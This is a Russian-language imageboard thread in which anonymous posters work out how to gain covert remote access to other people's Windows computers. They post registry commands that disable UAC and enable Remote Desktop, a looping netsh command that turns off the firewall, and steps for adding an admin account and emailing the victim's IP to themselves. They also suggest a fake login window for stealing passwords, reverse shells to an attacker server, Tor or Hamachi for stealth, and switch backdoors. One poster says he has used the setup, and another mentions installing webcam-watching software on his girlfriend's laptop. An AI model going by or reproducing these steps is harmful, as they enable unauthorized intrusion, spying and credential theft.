Наверное потому, что:
1) Не все сидят под админом. UAC для чего придумали?
2) Два аккаунта не могут работать одновременно на десктопной версии. Можно поставить какой-то там хак, но вроде только для XP.
Хотя я сам в душе не ебу, виндовсом не пользуюсь несколько лет, взгляд с дивана.
>>49881
1. UAC включён только у тех, кто не умеет его отключить.
2. Окей, не создаем акаунт. Узнаем имя пользователя и кидаем нам по имейлу. Если стоит пароль- фейковое окно авторизации в автозагрузку. Ктото возможно и клюнет.
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
и UAC сосет хуй
>>49882
Ну все равно, сам представь, ты же подключишься к уже работающему хомяку. Или надо будет ждать, пока он пойдет срать, оставив комп включенным, или просто наблюдать за тем, какую порнуху он смотрит.
>>49887
http://support.microsoft.com/kb/300698/ru
почитай на досуге
>>49895
Окей, значит там есть больше функций, чем я думал.
Но все равно, этот метод неэффективен для большинства, т.к. NAT и всякие роутеры будут встречаться гораздо чаще прямого подключения. Хотя, можно попробовать как-нибудь обойти эту проблему.
nat? чем нам помешает роутер?
>>49923>>49934
А вы вообще знаете, что такое NAT? А как работает RPD, знаете? А хуле вы тут делаете, если нет? А хуле тупые вопросы задаёте, если да?
Нельзя подключиться по IP-адресу к ПК, который работает за роутером, т.к. IP адрес принадлежит сетевому интерфейсу роутера, а не ПК. < Объяснение уровня /s/ для дебилов уровня /b/.
>>49936
>Нельзя подключиться по IP-адресу к ПК, который работает за роутером, т.к. IP адрес принадлежит сетевому интерфейсу роутера, а не ПК.
Я как раз вчера задался тем же самым вопросом. Да, знаю, что нельзя. Но как тогда БЕЗ РУЧНОЙ НАСТРОЙКИ РОУТЕРА, БЕЗ ПРОБРОСА ПОРТОВ подключаются такие программы, как: skype, teamviewer, tunngle?
http://www.winton.org.uk/zebedee/download.html
прога делает тоннель в обход nat.
>>49937
Ебать тут дибилы собрались, зашел блядь посмотреть, что изменилось за эти годы.
>такие программы, как: skype, teamviewer, tunngle?
UPnP, не не слышал.
>>49942
Это точно.
>>49937
Куда они подключаются, клоун? Ты ещё спроси, как email доходит до пользователя за NAT.
Skype и teamviewer работают через сторонние сервера, про tunngle ничего не знаю.
И, как уже анон сказал, есть UPnP, позволяющий автоматом пробросить порт машины. Для использования upnp нужно иметь доступ к роутеру со стороны локальной сети.
>>49949
Sup, есть пачка d-link dgs-3100 . так вот, надо поиметь руттам же полюбому закладки остались, только я проебал все полимеры на них
>>49965
Мне так и гуглить "root закладки в d-link dgs-3100"?
ты еблан?
вангую в тебе школьника-аутиста, либо же просто аутиста, озлобленного такого
С UAC-ом проблем не будет, если батник превратить в exe-шник, а к последнему приклеить правильный манифест. Тогда UAC окошко будет автоматом вылазить, так делают многие программы установщики.
А насчёт правильного эрдопе, его сейчас можно получить на всех виндах кроме 8.1
http://dicendum.ru/738/rdp-na-versiyah-starter-homebasic
на висту, семёрку и 8 - накатить Rdp wrapper
http://andrewblock.net/2013/07/19/enable-remote-desktop-on-windows-8-core/#comments
за RDP wrapper спасибо
>>50113
великолепно, я своей тян наконец-то залил прогу для просмотра вебки, а то у неё говнонетбук с говноначалкой не поддерживающей RPD, в каспера исключения получается добавить только физически или по rdp - радмин и vnc сакс
если будет годнота, выложу. добра тебе анон
soooooooooooooqua
http://support.microsoft.com/kb/303846/ru
если учетка без пароля- подключится к ней удаленно можно только сделав вот-так:
Ограничения, накладываемые пустым паролем, можно отключить, используя политику. Найдите и измените соответствующую политику, выполнив следующие действия:
Нажмите кнопку Пуск, выберите пункт Выполнить, введите команду gpedit.msc и нажмите кнопку OK, чтобы запустить редактор объектов групповой политики.
Откройте раздел Конфигурация компьютера\Конфигурация Windows\Параметры безопасности\Локальные политики\Параметры безопасности\Учетные записи: Limit local account use of blank passwords to console logon only.
Дважды щелкните элемент Limit local account use of blank passwords to consol logon only.
Выберите отключен и нажмите кнопку OK.
Закройте редактор групповой политики.
Примечание. По умолчанию данная политика включена.
так воооооооооооооот, как эту политику изменить из-под .bat файла?
>>49900
незаменто прикручивать VPN, вот так пошёл посрать, вернулся, а у тебя уже хамачи стоят
>>50211
у меня однажды было нашествие колобков... не знаю что они забыли)
Хамачи можно ставить в автоматическом режиме, но он довольно палевный, т.к. появляется много говорящих окон. Проще прокинуть обратное соединение на свой сервак, чтобы получить шелл или RDP.
revinetd и HTran в помощь
>>50223
Сервер то можно где угодно, главное чтоб IP белым был, и возможно только для временного бэк-коннекта, только чтоб комфортно VPN развернуть.
>>50230
А тор — вообще божественно. Ставится без окон (он в принципе без окон), прав админа не требует, у антивирусов в белом списке, да ещё и не зависит от белых-серых-динамических IP.
Каждый раз в таких тредах предлагаю, но каждый раз никто не осиливает. А некоторые ещё начинают забавными ссылками бросаться, вроде «ФБР признало свой контроль над TOR».
>>50231
двачую, этого осилившего, когда в феврале 2012 о биткоинах мало кто слышал, я начал помайнивать на компе не работе, оставляя майнилку на ночь. Как-то раз я обнаружил что мощность моего майнинья упала ровно в два раза, а еще у меня раскочегарен роутер i2p, причём когда я утром прихожу, шевелю мышкой врубается монитор и майнер мне показывает мои 30 мегахешей, но по статистике пула у меня стабильно 15. Короче подхватил я трояна, я не стал запариваться с определением коммандного сервера или выпиливанием просто написал шевелилку мышкой и запускал одним батником вместе с майнером.
Это конечно не ТОР но суть таже
прога готова.
1 вопрос- портов проброс.
а то в 90% случаев ип на имейл-то приходит, а вот connect не хочет, сучка
анон, как сделать ламповый порт и connect через mstsc туда?
вверх! сетапчик я собрал и применил несколько раз. один минус- моя почьта на gmail-е и он блокирует попытки входа с незнакомых айпи. пришлось сделать фейк на мейлру
>>49880
>Почему никто не догадался
Лол
Осло у меня один сбрученный сервер до сих пор жив, хотя ему уже три года, я с него еще вайпалкой сосач вайпал, когда с мдк была битва.
>>49880
Ну и нахуй ты все это скопипастил, причем даже с оветами на пост?
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2. Делаем учётку с правами админа.
3. Вырубаем файрвол
:ass
netsh advfirewall set allprofiles state off
goto ass
4. Шлем ІР хомячка себе на мыло.
(сохраняем страницу того же www.myip.ru с компа хомячка и отправляем себе)
4. Коннектимся оффициально
mstsc
5. this is so easy. Почему никто не догадался? Какие подводные камни?